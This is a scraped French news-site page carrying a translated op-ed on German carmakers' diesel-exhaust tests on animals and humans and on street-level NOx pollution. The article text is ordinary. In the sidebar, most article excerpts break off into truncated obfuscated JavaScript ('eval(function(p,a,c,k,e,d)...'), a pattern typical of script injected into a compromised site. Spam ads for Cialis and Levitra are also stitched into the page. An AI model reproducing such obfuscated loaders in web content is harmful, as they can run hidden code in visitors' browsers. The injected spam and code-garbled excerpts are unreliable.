REDHER - La pluma
Accueil Articles Droits Humains Multinationales


Dieselgate Tests sur les animaux : les vrais cobayes de l’industrie automobile, c’est nous

Envoyer Imprimer PDF

aut_5896BisLes révélations à propos des tests menés ces dernières années par les constructeurs allemands sur des singes et des humains suscitent une onde de choc dans le pays. Pourtant, le pire reste la pollution qui frappe l’homme de la rue, note le quotidien berlinois

 

 

Les tests sur les animaux et les êtres humains par lesquels l’industrie automobile allemande entendait démontrer l’innocuité des gaz d’échappement des moteurs diesel sont sans conteste répugnants et le fait d’irresponsables.

 

 

À la différence des expériences menées dans de nombreux domaines de la médecine, dont le bénéfice potentiel à tirer peut l’emporter sur les inconvénients, Volkswagen, BMWet Daimler ne cherchaient pas ici à faire surgir la vérité. Il s’agissait pour eux de promouvoir des véhicules apparemment propres, à en croire les tests et l’expérimentation animale, mais qui en réalité demeurent sales sur les routes.

Dans le même temps, on s’étonne quelque peu de l’énorme tollé que suscitent ces tests réalisés sur 10 singes et 25 hommes. Bien que ces expériences soient choquantes, le plus grand scandale reste l’expérimentation à laquelle l’industrie automobile se livre depuis des années sur une grande partie de la population.

 Dieselgate: les nouveaux feux de signalisation, par Enrico Bertuccioli

Non respect des normes européennes

Si les sujets des tests de laboratoire n’inhalaient que des gaz d’échappement purifiés pendant quelques heures, l’homme de la rue, lui, respire depuis des années des quantités d’oxydes d’azote bien supérieures aux normes autorisées par l’Union européenne (UE).

Et, contrairement à ce qui se passe en laboratoire, les résultats sont clairs : le non-respect par les véhicules à moteur diesel du seuil d’oxydes d’azote autorisé provoque, selon les calculs des scientifiques européens, plus de 11 000 décès prématurés par an en Europe.

Or si les tests en laboratoire sont aujourd’hui sources d’une condamnation de la classe politique et d’excuses de la part des industriels, celui grandeur nature qui se déroule dans la rue continue à être accepté. Les constructeurs automobiles se refusent toujours fermement à faire en sorte que leurs véhicules respectent les normes de l’UE – alors que ce serait possible. Et les responsables politiques non seulement laissent faire, mais s’opposent par tous les moyens juridiques possibles à la seule mesure qui permettrait de lutter efficacement contre la pollution de l’air : l’interdiction de circuler pour tous les véhicules qui dépassent les normes autorisées en fonctionnement réel.

Défaillance des politiques

On ne peut malheureusement pas s’attendre à ce que les choses changent rapidement si un nouveau gouvernement de grande coalition se met en place [à Berlin]. Les espoirs se portent plutôt sur le Tribunal administratif fédéral, qui doit trancher en dernière instance, en février, sur les interdictions de circulation. En revanche, ce serait un grand pas politique si ce scandale débouchait sur un scepticisme accru envers les constructeurs automobiles et les scientifiques qu’ils financent et qui sont intervenus comme témoins à décharge auprès de la commission d’enquête. On nous trompe et on nous ment à tous les étages sur le diesel – et pas seulement concernant les tests insensés menés sur les animaux.

Malte Kreutzfeldt

Original: Abgastest an Menschen: Die Straße ist dreckiger als das Labor

Traduit par Courrier international

Source : Tlaxcala, le 31 janvier 2018


 
Plus d'articles :

» Allemagne : Hans-Georg Maassen peut se sentir confirmé

Hans-Georg Maassen, en sa qualité de président de l’Office fédéral allemand de protection de la Constitution, a entamé la confiance dans la démocratie. Sa promotion pourrait aggraver les choses.Hans-Georg Maassen, président de l'Office de...

» Catalogne: le parquet allemand favorable à l'extradition de Puigdemont vers l'Espagne

Le eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...

» Avec l’arrestation de Carles Puigdemont, l'Allemagne a son premier prisonnier politique

La eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...

» Merkel crie au "massacre" dans la Ghouta orientale et élude la responsabilité allemande

“Massacre eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...

» Allemagne : l’impérialisme de la Grande Coalition, un accord sur l’extension de la zone de combat

Cet eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...

» La Tunisie poussée dans un cul-de-sac : les entreprises allemandes y sont pour quelque chose

TUNIS eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...

» Tsipras : magnifique salaud

Pour eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...

» Le rituel de la cérémonie d’allégeance à Angela Merkel

Le eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...

» Perseverare diabolicum. De la Grèce du Mémorandum 4bis à la France de Macron

Sept eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...

» En Allemagne, l’armée rattrapée par la “nostalgieˮ de la Wehrmacht

La eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...

Ajouter un Commentaire


Code de sécurité
Rafraîchir

Gracias, pero con Cialis soft intentaron sin embargo, lo que los medicamentos como el Viagra comprar-cialis.net

Les dossiers brûlants d'actualité

 

Éditorial La Pluma n ° 1: À tou.tes

Nous eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};...

 

Venezuela: la parole au Pouvoir constituant originel, le peuple !

« Dans eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){retur...
Uno Levitra Professional es de los MEDICAMENTOS mas Comunes comprar levitra en-linea

Compteur des visites

mod_vvisit_countermod_vvisit_countermod_vvisit_countermod_vvisit_countermod_vvisit_countermod_vvisit_countermod_vvisit_countermod_vvisit_countermod_vvisit_counter
mod_vvisit_counterAujourd'hui7667
mod_vvisit_counterHier12092
mod_vvisit_counterCette semaine19759
mod_vvisit_countersemaine précedente86228
mod_vvisit_counterCe-mois-ci236406
mod_vvisit_countermois précedent332053

We have: 208 guests online
Ton IP: 54.158.199.217
 , 
Aujourd'hui: 24 Sep 2018